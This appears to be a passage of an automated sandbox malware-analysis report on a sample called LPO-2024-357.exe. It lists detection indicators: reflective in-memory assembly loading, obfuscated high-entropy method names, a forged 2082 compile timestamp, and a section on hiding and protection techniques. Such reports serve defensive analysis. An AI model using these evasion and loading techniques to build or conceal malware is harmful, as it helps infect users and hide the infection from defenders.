
                        barindex
                        Source: 0.2.LPO-2024-357.exe.79a0000.4.raw.unpack, kAOj1Y7pfP90kycNNw.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
                        Source: 0.2.LPO-2024-357.exe.2dac680.0.raw.unpack, kAOj1Y7pfP90kycNNw.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
                        Source: 0.2.LPO-2024-357.exe.79a0000.4.raw.unpack, GtaAIbrHXObmMm8GPA.cs.Net Code: vaH8QmOOp System.Reflection.Assembly.Load(byte[])
                        Source: 0.2.LPO-2024-357.exe.9210000.5.raw.unpack, ReVixo9FXbxWPDnqBj.cs.Net Code: lYhuqjr8xB System.Reflection.Assembly.Load(byte[])
                        Source: 0.2.LPO-2024-357.exe.2dac680.0.raw.unpack, GtaAIbrHXObmMm8GPA.cs.Net Code: vaH8QmOOp System.Reflection.Assembly.Load(byte[])
                        Source: 0.2.LPO-2024-357.exe.3d77298.3.raw.unpack, ReVixo9FXbxWPDnqBj.cs.Net Code: lYhuqjr8xB System.Reflection.Assembly.Load(byte[])
                        Source: LPO-2024-357.exeStatic PE information: 0xD373E82A [Tue Jun 2 01:17:30 2082 UTC]
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeCode function: 0_2_07B02C30 pushad ; iretd 0_2_07B02C31
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeCode function: 4_2_004029C9 pushfd ; ret 4_2_00402B30
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeCode function: 4_2_0040294A pushfd ; ret 4_2_00402957
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeCode function: 4_2_0040784E pushfd ; ret 4_2_0040784F
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeCode function: 4_2_0040354F pushfd ; ret 4_2_00403550
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeCode function: 4_2_00402959 pushfd ; ret 4_2_00402975
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeCode function: 4_2_0040865B pushfd ; ret 4_2_0040865C
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeCode function: 4_2_004098EC pushfd ; ret 4_2_004099A3
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeCode function: 4_2_00402977 pushfd ; ret 4_2_00402998
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeCode function: 4_2_004066FC pushfd ; ret 4_2_00406763
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeCode function: 4_2_00403E01 push esi; retf 4_2_00403E0C
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeCode function: 4_2_00403706 pushfd ; ret 4_2_00403707
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeCode function: 4_2_00406291 pushfd ; ret 4_2_00406293
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeCode function: 4_2_0040299A pushfd ; ret 4_2_004029C7
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeCode function: 4_2_00407CAD pushfd ; ret 4_2_00407CAE
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeCode function: 4_2_00409A2E pushfd ; ret 4_2_00409A39
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeCode function: 4_2_00402B32 pushfd ; ret 4_2_00402B3F
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeCode function: 4_2_00405333 pushfd ; ret 4_2_00405338
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeCode function: 4_2_00402937 pushfd ; ret 4_2_00402948
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeCode function: 4_2_004077BD pushfd ; ret 4_2_004077C4
                        Source: LPO-2024-357.exeStatic PE information: section name: .text entropy: 7.662076834159514
                        Source: 0.2.LPO-2024-357.exe.79a0000.4.raw.unpack, FZaOUuOPvnEAfIAr0M.csHigh entropy of concatenated method names: 'lEA0fIAr0', 'tZCA8AZk9', 'gXO9bmMm8', 'DGw7NTeNK', 'Om2dkTqQy', 'EZYgaiyMO', 'Dispose', 'FZaOOUuPv', 'pv8tyvFJFxYXZkDera', 'y16QeXgcC0F7yngarN'
                        Source: 0.2.LPO-2024-357.exe.79a0000.4.raw.unpack, GtaAIbrHXObmMm8GPA.csHigh entropy of concatenated method names: 't43wlqHDE', 'b331V9lSR', 'y0lQR8D9G', 'PPrmXmJxA', 'CF9acgM2i', 'eykiYV7wh', 'vSMVwpZMk', 'kxKJsuLoh', 'Ny8e5Nb61', 'qdOCMMDun'
                        Source: 0.2.LPO-2024-357.exe.79a0000.4.raw.unpack, kAOj1Y7pfP90kycNNw.csHigh entropy of concatenated method names: 'lb2Ia3XrDtd392xi2Tb', 'XJIblTXQXnFqByJBCJm', 'uLEr9lUTy0', 'Y8R45UX8CExDEFrtuqs', 'ye0NJSX7mZWAZIVVpiG', 'WY1PxJXMKygj5Preg16', 'ELG2kXXJWTZduCJNQBl', 'RgtTUJcyZL', 'wUUrNltvEH', 'CJErdEKrT9'
                        Source: 0.2.LPO-2024-357.exe.9210000.5.raw.unpack, wVsEJWTDvwyX4LMlub.csHigh entropy of concatenated method names: 'Hu0gwsJyHJ', 'T5OgEF21nP', 'z1B8xBJJL5', 'JPB8kyqqTK', 'qfa8fyIp1l', 'v7K8L9ONs6', 'SPg8rGsNWt', 'YMl8KvlRBc', 'AEn8mCj6Vy', 'a6Y804RBta'
                        Source: 0.2.LPO-2024-357.exe.9210000.5.raw.unpack, Wd4vZerwXMtTQEU9C8.csHigh entropy of concatenated method names: 'M1EVX49Jlv', 'UhaV8vJLUb', 'fqVVZZGqEn', 'fgVZde7ZHk', 'N06ZzxH9J9', 'SHJVbwsFk9', 'oQoV4ZRZw3', 'DoCVoIe5N4', 'brpVUZsZyO', 'KlYVuRi9hK'
                        Source: 0.2.LPO-2024-357.exe.9210000.5.raw.unpack, GknCMqyRlympfcwDQy.csHigh entropy of concatenated method names: 'EgZJP3Ur25', 'QwhJiSeGgb', 'oGEJxKBH0L', 'mN2Jk37Dmc', 'HeBJf1cI9p', 'SMEJLB4FOX', 'llTJrajWld', 'zjaJKjB0bs', 'QMPJmVTlG5', 'cUkJ0EZZQF'
                        Source: 0.2.LPO-2024-357.exe.9210000.5.raw.unpack, LxLN1o4u5TU8DEkAktl.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'WRo2JLGRpk', 'DJ92nwEMAs', 'elT2Al6nWk', 'zva220CYRe', 'PG42ePGiBk', 'vtr2sJW6gn', 'DZH2jaSDL2'
                        Source: 0.2.LPO-2024-357.exe.9210000.5.raw.unpack, dKYoAIYwHWmZ81fnaR.csHigh entropy of concatenated method names: 'i2Q8HIsGqf', 'uUM8t9e2m2', 't7g8peSW8X', 'kar8Y7b0S2', 'eQB8cO1TeS', 'rmy86F3UIc', 'UIY8Dvtrdn', 'y8e87opn7R', 'r1N8JDEbme', 'HXS8n289Ka'
                        Source: 0.2.LPO-2024-357.exe.9210000.5.raw.unpack, o90pySpvXwWvR2PmHy.csHigh entropy of concatenated method names: 'T0YaIlpEHO', 'uvDa3D8MeQ', 'sbgalreXVB', 'NKyahaCRZF', 'krDaW8qEYc', 'tnKaCPhO3F', 'UmnaSLFBCo', 'I5navRgBWv', 'cHLayIG0AE', 'tqCadK2GlG'
                        Source: 0.2.LPO-2024-357.exe.9210000.5.raw.unpack, biAo3CCadsOHCxGAKa.csHigh entropy of concatenated method names: 'wotDvG7gxU', 'NBDDds5Cn3', 'HZ47bxMq21', 'YN074XMiRr', 'K5tD1w9ZUx', 'jqAD5wkoWC', 'uieDNLIpeD', 'bx8DIbrHYO', 'y06D3M5hED', 'QoSDl9gJGn'
                        Source: 0.2.LPO-2024-357.exe.9210000.5.raw.unpack, z1rEmaSjKEwXLXVS0v.csHigh entropy of concatenated method names: 'KZWJcl8Bcy', 'cgBJDy05kG', 'v5UJJr2YqE', 'XIdJAVpfNk', 'nHFJemZgb1', 'tdwJj9gTuN', 'Dispose', 'qKg7XkE1nn', 'RJH7ahmxbj', 'MdJ78yXg4a'
                        Source: 0.2.LPO-2024-357.exe.9210000.5.raw.unpack, xqmYXJNb80rOolpRcy.csHigh entropy of concatenated method names: 'weARpwu03p', 'hpjRYYVGba', 'UINRPVDTKB', 'bVRRif38lC', 'zMORkgSg67', 'vnKRfK92yD', 'ryoRr6ueke', 'AZrRK6XsNb', 'e0UR0ZLVNt', 'lRBR1eK03o'
                        Source: 0.2.LPO-2024-357.exe.9210000.5.raw.unpack, hg6PuKaIUTWqyZTwof.csHigh entropy of concatenated method names: 'Dispose', 'CwX4yLXVS0', 'eV2oiQDdKH', 'Ir1GwwSFZw', 'W0G4d88UXE', 'iUE4zAWibJ', 'ProcessDialogKey', 'SxiobknCMq', 'nlyo4mpfcw', 'qQyooDqCRG'
                        Source: 0.2.LPO-2024-357.exe.9210000.5.raw.unpack, xwwaHFlcpyWYafS9HT.csHigh entropy of concatenated method names: 'ToString', 'Tgt61fqxZ3', 'yvg6ieR1Ce', 'Q5Z6xSybn7', 'qfw6k2dbVN', 'MPQ6fEgUGt', 'dVo6LKexu3', 'mJV6roDgcF', 'tLo6KKkFQj', 'P2O6moyRKN'
                        Source: 0.2.LPO-2024-357.exe.9210000.5.raw.unpack, V8qCOsz1aCYM0FFjDu.csHigh entropy of concatenated method names: 'eFqntYasEu', 'IaNnpQqxo6', 'NoNnY0kyGI', 'oQcnPbRPh2', 'Sanni3AsGC', 'rTXnkFEj2W', 'SY8nf47hDU', 'Ctonj1EPC5', 'wnpnBCYgCc', 'OfenF98SxX'
                        Source: 0.2.LPO-2024-357.exe.9210000.5.raw.unpack, lpGn1vhAidsBt9VDt7.csHigh entropy of concatenated method names: 'M7mDODGSPf', 'qNhDQrRXop', 'ToString', 'iARDXrLHBB', 'QMMDaof4Ic', 'xaKD8abFQ3', 'mAwDgSw5PU', 'jTUDZsm3ax', 'GUaDVeB7of', 'kuyD9UbbOW'
                        Source: 0.2.LPO-2024-357.exe.9210000.5.raw.unpack, nwechnIN2C1GknPJNl.csHigh entropy of concatenated method names: 'Lhgc0A8kWE', 'h7wc5WpvRf', 'RkAcIgmcVW', 'xoec3fkHj0', 'U4XciMqHy3', 'QrOcxrHvlU', 'Gbccks6eCV', 'vLGcfYj98w', 'zK5cLQBd9D', 'qojcr4nfmN'
                        Source: 0.2.LPO-2024-357.exe.9210000.5.raw.unpack, CNWYXAmmSQN9gn7JgY.csHigh entropy of concatenated method names: 'sCUVBWENgp', 'vsUVFt2KpS', 'pL4VqFh8ca', 'XJvVHyMZbY', 'inxVwRQPmv', 'jAsVt8kpSZ', 'rknVElleLA', 'hLVVp7u1Eg', 'mVlVYlZT6R', 'h7cVTGLafN'
                        Source: 0.2.LPO-2024-357.exe.9210000.5.raw.unpack, ReVixo9FXbxWPDnqBj.csHigh entropy of concatenated method names: 'VPIUMEI8O5', 'jZdUXbuuM0', 'lWZUadnnko', 'k26U84hpKV', 'X4SUgJVQF2', 'TYrUZPyoD3', 'n22UVBTcGo', 'chXU9bgLGG', 'ooOUGLZOWo', 's3BUOskoRQ'
                        Source: 0.2.LPO-2024-357.exe.9210000.5.raw.unpack, pqCRGrd2frqfJnxf1h.csHigh entropy of concatenated method names: 'Mfun8FZons', 'BnLngS0rl6', 'wdsnZUVZnU', 'k9anVZ4dLI', 'kZxnJSCbPY', 'XHen9pPwrW', 'Next', 'Next', 'Next', 'NextBytes'
                        Source: 0.2.LPO-2024-357.exe.9210000.5.raw.unpack, SEBiQwPt6WU0SAZ8tk.csHigh entropy of concatenated method names: 'vHZZMIHZV4', 'RD2ZapVv5l', 'AwVZgr07iH', 'lD3ZVP2ki0', 'T8xZ9jhieB', 'RNrgWcnJUl', 'QSXgClNlHq', 'uhdgSiIgfm', 'RAkgvRYNJE', 'Uh6gyGT7Gs'
                        Source: 0.2.LPO-2024-357.exe.9210000.5.raw.unpack, QdhkEY44Qq70AvWrNDq.csHigh entropy of concatenated method names: 'TCRndJB9Sp', 'agknzAkgvL', 'J5WAbW6eKm', 'q6NA4YGbb7', 'CGiAoytNMH', 'jn4AUmaAO4', 'qEKAuIucTR', 'U1ZAMVsptw', 'k1XAXeWXKv', 'OE5AaNNbnf'
                        Source: 0.2.LPO-2024-357.exe.9210000.5.raw.unpack, PcQpnbuNrmP2ZDMX0M.csHigh entropy of concatenated method names: 'nKc4V90pyS', 'XXw49WvR2P', 'RwH4OWmZ81', 'Jna4QRjVsE', 'KMl4cub3EB', 'GQw46t6WU0', 'RLOwnpffredFciEmkL', 'Pr3USkD0xrZ1IgAMew', 'LhJ44DTctq', 'OMe4USIH0B'
                        Source: 0.2.LPO-2024-357.exe.9210000.5.raw.unpack, FnoyBCoVB4RcJxtEnm.csHigh entropy of concatenated method names: 'SmVqM8JFX', 'VRUHuJuoT', 'qSkt9VXxg', 'uwWEFSXMf', 'm6lYHDqM0', 'peuTisNGP', 'qYWNfTuSg0xwX5B1nN', 'rGboQ198E5HujDGAVH', 'HO67KoDA1', 'y64nNIUgF'
                        Source: 0.2.LPO-2024-357.exe.2dac680.0.raw.unpack, FZaOUuOPvnEAfIAr0M.csHigh entropy of concatenated method names: 'lEA0fIAr0', 'tZCA8AZk9', 'gXO9bmMm8', 'DGw7NTeNK', 'Om2dkTqQy', 'EZYgaiyMO', 'Dispose', 'FZaOOUuPv', 'pv8tyvFJFxYXZkDera', 'y16QeXgcC0F7yngarN'
                        Source: 0.2.LPO-2024-357.exe.2dac680.0.raw.unpack, GtaAIbrHXObmMm8GPA.csHigh entropy of concatenated method names: 't43wlqHDE', 'b331V9lSR', 'y0lQR8D9G', 'PPrmXmJxA', 'CF9acgM2i', 'eykiYV7wh', 'vSMVwpZMk', 'kxKJsuLoh', 'Ny8e5Nb61', 'qdOCMMDun'
                        Source: 0.2.LPO-2024-357.exe.2dac680.0.raw.unpack, kAOj1Y7pfP90kycNNw.csHigh entropy of concatenated method names: 'lb2Ia3XrDtd392xi2Tb', 'XJIblTXQXnFqByJBCJm', 'uLEr9lUTy0', 'Y8R45UX8CExDEFrtuqs', 'ye0NJSX7mZWAZIVVpiG', 'WY1PxJXMKygj5Preg16', 'ELG2kXXJWTZduCJNQBl', 'RgtTUJcyZL', 'wUUrNltvEH', 'CJErdEKrT9'
                        Source: 0.2.LPO-2024-357.exe.3d77298.3.raw.unpack, wVsEJWTDvwyX4LMlub.csHigh entropy of concatenated method names: 'Hu0gwsJyHJ', 'T5OgEF21nP', 'z1B8xBJJL5', 'JPB8kyqqTK', 'qfa8fyIp1l', 'v7K8L9ONs6', 'SPg8rGsNWt', 'YMl8KvlRBc', 'AEn8mCj6Vy', 'a6Y804RBta'
                        Source: 0.2.LPO-2024-357.exe.3d77298.3.raw.unpack, Wd4vZerwXMtTQEU9C8.csHigh entropy of concatenated method names: 'M1EVX49Jlv', 'UhaV8vJLUb', 'fqVVZZGqEn', 'fgVZde7ZHk', 'N06ZzxH9J9', 'SHJVbwsFk9', 'oQoV4ZRZw3', 'DoCVoIe5N4', 'brpVUZsZyO', 'KlYVuRi9hK'
                        Source: 0.2.LPO-2024-357.exe.3d77298.3.raw.unpack, GknCMqyRlympfcwDQy.csHigh entropy of concatenated method names: 'EgZJP3Ur25', 'QwhJiSeGgb', 'oGEJxKBH0L', 'mN2Jk37Dmc', 'HeBJf1cI9p', 'SMEJLB4FOX', 'llTJrajWld', 'zjaJKjB0bs', 'QMPJmVTlG5', 'cUkJ0EZZQF'
                        Source: 0.2.LPO-2024-357.exe.3d77298.3.raw.unpack, LxLN1o4u5TU8DEkAktl.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'WRo2JLGRpk', 'DJ92nwEMAs', 'elT2Al6nWk', 'zva220CYRe', 'PG42ePGiBk', 'vtr2sJW6gn', 'DZH2jaSDL2'
                        Source: 0.2.LPO-2024-357.exe.3d77298.3.raw.unpack, dKYoAIYwHWmZ81fnaR.csHigh entropy of concatenated method names: 'i2Q8HIsGqf', 'uUM8t9e2m2', 't7g8peSW8X', 'kar8Y7b0S2', 'eQB8cO1TeS', 'rmy86F3UIc', 'UIY8Dvtrdn', 'y8e87opn7R', 'r1N8JDEbme', 'HXS8n289Ka'
                        Source: 0.2.LPO-2024-357.exe.3d77298.3.raw.unpack, o90pySpvXwWvR2PmHy.csHigh entropy of concatenated method names: 'T0YaIlpEHO', 'uvDa3D8MeQ', 'sbgalreXVB', 'NKyahaCRZF', 'krDaW8qEYc', 'tnKaCPhO3F', 'UmnaSLFBCo', 'I5navRgBWv', 'cHLayIG0AE', 'tqCadK2GlG'
                        Source: 0.2.LPO-2024-357.exe.3d77298.3.raw.unpack, biAo3CCadsOHCxGAKa.csHigh entropy of concatenated method names: 'wotDvG7gxU', 'NBDDds5Cn3', 'HZ47bxMq21', 'YN074XMiRr', 'K5tD1w9ZUx', 'jqAD5wkoWC', 'uieDNLIpeD', 'bx8DIbrHYO', 'y06D3M5hED', 'QoSDl9gJGn'
                        Source: 0.2.LPO-2024-357.exe.3d77298.3.raw.unpack, z1rEmaSjKEwXLXVS0v.csHigh entropy of concatenated method names: 'KZWJcl8Bcy', 'cgBJDy05kG', 'v5UJJr2YqE', 'XIdJAVpfNk', 'nHFJemZgb1', 'tdwJj9gTuN', 'Dispose', 'qKg7XkE1nn', 'RJH7ahmxbj', 'MdJ78yXg4a'
                        Source: 0.2.LPO-2024-357.exe.3d77298.3.raw.unpack, xqmYXJNb80rOolpRcy.csHigh entropy of concatenated method names: 'weARpwu03p', 'hpjRYYVGba', 'UINRPVDTKB', 'bVRRif38lC', 'zMORkgSg67', 'vnKRfK92yD', 'ryoRr6ueke', 'AZrRK6XsNb', 'e0UR0ZLVNt', 'lRBR1eK03o'
                        Source: 0.2.LPO-2024-357.exe.3d77298.3.raw.unpack, hg6PuKaIUTWqyZTwof.csHigh entropy of concatenated method names: 'Dispose', 'CwX4yLXVS0', 'eV2oiQDdKH', 'Ir1GwwSFZw', 'W0G4d88UXE', 'iUE4zAWibJ', 'ProcessDialogKey', 'SxiobknCMq', 'nlyo4mpfcw', 'qQyooDqCRG'
                        Source: 0.2.LPO-2024-357.exe.3d77298.3.raw.unpack, xwwaHFlcpyWYafS9HT.csHigh entropy of concatenated method names: 'ToString', 'Tgt61fqxZ3', 'yvg6ieR1Ce', 'Q5Z6xSybn7', 'qfw6k2dbVN', 'MPQ6fEgUGt', 'dVo6LKexu3', 'mJV6roDgcF', 'tLo6KKkFQj', 'P2O6moyRKN'
                        Source: 0.2.LPO-2024-357.exe.3d77298.3.raw.unpack, V8qCOsz1aCYM0FFjDu.csHigh entropy of concatenated method names: 'eFqntYasEu', 'IaNnpQqxo6', 'NoNnY0kyGI', 'oQcnPbRPh2', 'Sanni3AsGC', 'rTXnkFEj2W', 'SY8nf47hDU', 'Ctonj1EPC5', 'wnpnBCYgCc', 'OfenF98SxX'
                        Source: 0.2.LPO-2024-357.exe.3d77298.3.raw.unpack, lpGn1vhAidsBt9VDt7.csHigh entropy of concatenated method names: 'M7mDODGSPf', 'qNhDQrRXop', 'ToString', 'iARDXrLHBB', 'QMMDaof4Ic', 'xaKD8abFQ3', 'mAwDgSw5PU', 'jTUDZsm3ax', 'GUaDVeB7of', 'kuyD9UbbOW'
                        Source: 0.2.LPO-2024-357.exe.3d77298.3.raw.unpack, nwechnIN2C1GknPJNl.csHigh entropy of concatenated method names: 'Lhgc0A8kWE', 'h7wc5WpvRf', 'RkAcIgmcVW', 'xoec3fkHj0', 'U4XciMqHy3', 'QrOcxrHvlU', 'Gbccks6eCV', 'vLGcfYj98w', 'zK5cLQBd9D', 'qojcr4nfmN'
                        Source: 0.2.LPO-2024-357.exe.3d77298.3.raw.unpack, CNWYXAmmSQN9gn7JgY.csHigh entropy of concatenated method names: 'sCUVBWENgp', 'vsUVFt2KpS', 'pL4VqFh8ca', 'XJvVHyMZbY', 'inxVwRQPmv', 'jAsVt8kpSZ', 'rknVElleLA', 'hLVVp7u1Eg', 'mVlVYlZT6R', 'h7cVTGLafN'
                        Source: 0.2.LPO-2024-357.exe.3d77298.3.raw.unpack, ReVixo9FXbxWPDnqBj.csHigh entropy of concatenated method names: 'VPIUMEI8O5', 'jZdUXbuuM0', 'lWZUadnnko', 'k26U84hpKV', 'X4SUgJVQF2', 'TYrUZPyoD3', 'n22UVBTcGo', 'chXU9bgLGG', 'ooOUGLZOWo', 's3BUOskoRQ'
                        Source: 0.2.LPO-2024-357.exe.3d77298.3.raw.unpack, pqCRGrd2frqfJnxf1h.csHigh entropy of concatenated method names: 'Mfun8FZons', 'BnLngS0rl6', 'wdsnZUVZnU', 'k9anVZ4dLI', 'kZxnJSCbPY', 'XHen9pPwrW', 'Next', 'Next', 'Next', 'NextBytes'
                        Source: 0.2.LPO-2024-357.exe.3d77298.3.raw.unpack, SEBiQwPt6WU0SAZ8tk.csHigh entropy of concatenated method names: 'vHZZMIHZV4', 'RD2ZapVv5l', 'AwVZgr07iH', 'lD3ZVP2ki0', 'T8xZ9jhieB', 'RNrgWcnJUl', 'QSXgClNlHq', 'uhdgSiIgfm', 'RAkgvRYNJE', 'Uh6gyGT7Gs'
                        Source: 0.2.LPO-2024-357.exe.3d77298.3.raw.unpack, QdhkEY44Qq70AvWrNDq.csHigh entropy of concatenated method names: 'TCRndJB9Sp', 'agknzAkgvL', 'J5WAbW6eKm', 'q6NA4YGbb7', 'CGiAoytNMH', 'jn4AUmaAO4', 'qEKAuIucTR', 'U1ZAMVsptw', 'k1XAXeWXKv', 'OE5AaNNbnf'
                        Source: 0.2.LPO-2024-357.exe.3d77298.3.raw.unpack, PcQpnbuNrmP2ZDMX0M.csHigh entropy of concatenated method names: 'nKc4V90pyS', 'XXw49WvR2P', 'RwH4OWmZ81', 'Jna4QRjVsE', 'KMl4cub3EB', 'GQw46t6WU0', 'RLOwnpffredFciEmkL', 'Pr3USkD0xrZ1IgAMew', 'LhJ44DTctq', 'OMe4USIH0B'
                        Source: 0.2.LPO-2024-357.exe.3d77298.3.raw.unpack, FnoyBCoVB4RcJxtEnm.csHigh entropy of concatenated method names: 'SmVqM8JFX', 'VRUHuJuoT', 'qSkt9VXxg', 'uwWEFSXMf', 'm6lYHDqM0', 'peuTisNGP', 'qYWNfTuSg0xwX5B1nN', 'rGboQ198E5HujDGAVH', 'HO67KoDA1', 'y64nNIUgF'

                        Hooking and other Techniques for Hiding and Protection

                        barindex
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\LPO-2024-357.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
